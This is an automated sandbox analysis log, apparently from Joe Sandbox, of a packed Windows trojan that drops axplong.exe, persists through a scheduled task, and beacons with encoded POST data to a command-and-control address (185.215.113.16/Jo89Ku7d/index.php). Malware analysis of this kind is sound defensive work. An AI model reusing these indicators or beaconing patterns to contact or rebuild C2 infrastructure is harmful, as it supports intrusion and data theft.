                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Source: Joe Sandbox ViewIP Address: 185.215.113.16 185.215.113.16
                    Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                    Source: unknownDNS traffic detected: query: 15.164.165.52.in-addr.arpa replaycode: Name error (3)
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_002BBD60 InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,6_2_002BBD60
                    Source: global trafficDNS traffic detected: DNS query: 15.164.165.52.in-addr.arpa
                    Source: unknownHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: axplong.exe, 00000006.00000002.2980255678.0000000000EA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php
                    Source: axplong.exe, 00000006.00000002.2980255678.0000000000EA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php/
                    Source: axplong.exe, 00000006.00000002.2980255678.0000000000E90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php=
                    Source: axplong.exe, 00000006.00000002.2980255678.0000000000E90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpD
                    Source: axplong.exe, 00000006.00000002.2980255678.0000000000E90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpE
                    Source: axplong.exe, 00000006.00000002.2980255678.0000000000EA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpI
                    Source: axplong.exe, 00000006.00000002.2980255678.0000000000EA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpJ
                    Source: axplong.exe, 00000006.00000002.2980255678.0000000000EA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpX
                    Source: axplong.exe, 00000006.00000002.2980255678.0000000000E90000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000002.2980255678.0000000000EA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpY
                    Source: axplong.exe, 00000006.00000002.2980255678.0000000000E90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpded
                    Source: axplong.exe, 00000006.00000002.2980255678.0000000000E90000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000002.2980255678.0000000000E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpi
                    Source: axplong.exe, 00000006.00000002.2980255678.0000000000E90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncoded
                    Source: axplong.exe, 00000006.00000002.2980255678.0000000000E90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncodedV
                    Source: axplong.exe, 00000006.00000002.2980255678.0000000000E90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncodedn
                    Source: axplong.exe, 00000006.00000002.2980255678.0000000000E90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpq
                    Source: axplong.exe, 00000006.00000002.2980255678.0000000000E90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpy
                    Source: axplong.exe, 00000006.00000002.2980255678.0000000000E90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpy1mb3JtLXVybGVuY29kZWQ=
                    Source: axplong.exe, 00000006.00000002.2980255678.0000000000EA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpz

                    System Summary

                    Source: file.exeStatic PE information: section name:
                    Source: file.exeStatic PE information: section name: .idata
                    Source: file.exeStatic PE information: section name:
                    Source: axplong.exe.0.drStatic PE information: section name:
                    Source: axplong.exe.0.drStatic PE information: section name: .idata
                    Source: axplong.exe.0.drStatic PE information: section name:
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Tasks\axplong.jobJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_002F30686_2_002F3068
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_002BE4406_2_002BE440
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_002B4CF06_2_002B4CF0
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_002E7D836_2_002E7D83
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_002F765B6_2_002F765B
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_002B4AF06_2_002B4AF0
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_002F87206_2_002F8720
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_002F6F096_2_002F6F09
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_002F777B6_2_002F777B
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_002F2BD06_2_002F2BD0
                    Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: file.exeStatic PE information: Section: ZLIB complexity 0.9974242166212534
                    Source: file.exeStatic PE information: Section: mtnloani ZLIB complexity 0.994482129491018
                    Source: axplong.exe.0.drStatic PE information: Section: ZLIB complexity 0.9974242166212534
                    Source: axplong.exe.0.drStatic PE information: Section: mtnloani ZLIB complexity 0.994482129491018
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@5/3@1/1
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeMutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\44111dbc49Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: file.exeReversingLabs: Detection: 52%
                    Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: axplong.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: mstask.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: dui70.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: duser.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: chartv.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: oleacc.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: atlthunk.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: winsta.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: explorerframe.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32Jump to behavior
                    Source: file.exeStatic file information: File size 1913344 > 1048576
                    Source: file.exeStatic PE information: Raw size of mtnloani is bigger than: 0x100000 < 0x1a1800

                    Data Obfuscation

                    Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.500000.0.unpack :EW;.rsrc:W;.idata :W; :EW;mtnloani:EW;bcuuovzp:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;mtnloani:EW;bcuuovzp:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Unpacked PE file: 1.2.axplong.exe.2b0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;mtnloani:EW;bcuuovzp:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;mtnloani:EW;bcuuovzp:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Unpacked PE file: 2.2.axplong.exe.2b0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;mtnloani:EW;bcuuovzp:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;mtnloani:EW;bcuuovzp:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Unpacked PE file: 6.2.axplong.exe.2b0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;mtnloani:EW;bcuuovzp:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;mtnloani:EW;bcuuovzp:EW;.taggant:EW;
                    Source: initial sample Static PE information: section where entry point is pointing to: .taggant
                    Source: axplong.exe.0.dr Static PE information: real checksum: 0x1d3bff should be: 0x1d8807
                    Source: file.exe Static PE information: real checksum: 0x1d3bff should be: 0x1d8807
                    Source: file.exe Static PE information: section name:
                    Source: file.exe Static PE information: section name: .idata
                    Source: file.exe Static PE information: section name:
                    Source: file.exe Static PE information: section name: mtnloani
                    Source: file.exe Static PE information: section name: bcuuovzp
                    Source: file.exe Static PE information: section name: .taggant
                    Source: axplong.exe.0.dr Static PE information: section name:
                    Source: axplong.exe.0.dr Static PE information: section name: .idata
                    Source: axplong.exe.0.dr Static PE information: section name:
